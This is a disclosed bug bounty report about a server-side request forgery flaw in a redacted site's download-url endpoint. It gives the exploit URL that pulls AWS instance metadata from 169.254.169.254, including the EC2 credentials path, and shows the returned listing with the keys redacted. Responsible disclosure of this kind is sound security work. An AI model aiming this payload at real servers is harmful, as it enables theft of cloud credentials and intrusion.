SSRF to read AWS metaData at https://█████/ [HtUS]
Critical
Vulnerability Details
Hello Team,
While researching your program I found that the domain https://████/ is vulnerable to Server Side Request Frogery Attacks via the url parameter.
An attacker is able to fetch the aws metadata abusing the SSRF at https://████████/
============================SUMMARY=========================
## Vulnerable URL:
https://███████/
## Vulnerable Path:
/api/v1/download-url?url=http://169.254.169.254/latest/meta-data/
## Final Exploit URL:
https://█████/api/v1/download-url?url=http://169.254.169.254/latest/meta-data/
## Exploited AWS metadata
```
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hostname
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
```
## Exposed Credentials:
https://█████████/api/v1/download-url?url=http://169.254.169.254/2021-07-15/meta-data/identity-credentials/ec2/security-credentials/ec2-instance
```
{
"Code" : "Success",
"LastUpdated" : "2022-07-04T11:22:59Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "███",
"SecretAccessKey" : "████",
"Token" : "████
```
===========================STEPS TO REPRODUCE==========================
1) Go to the above Exploit URL, i.e; https://█████/api/v1/download-url?url=http://169.254.169.254/latest/meta-data/
2) You will see the AWS Metadata being fetched and exposed.
## Impact
An attacker is able to explore and fertch the AWS metadata via the SSRF. This SSRF can be used to perform other attack vectors as well such as scanning internal ports. A successful SSRF attack can often result in unauthorized actions or access to data within the organization, either in the vulnerable application itself or on other back-end systems that the application can communicate with.
Actions
View on HackerOneReport Stats
- Report ID: 1624140
- State: Closed
- Substate: resolved
- Upvotes: 49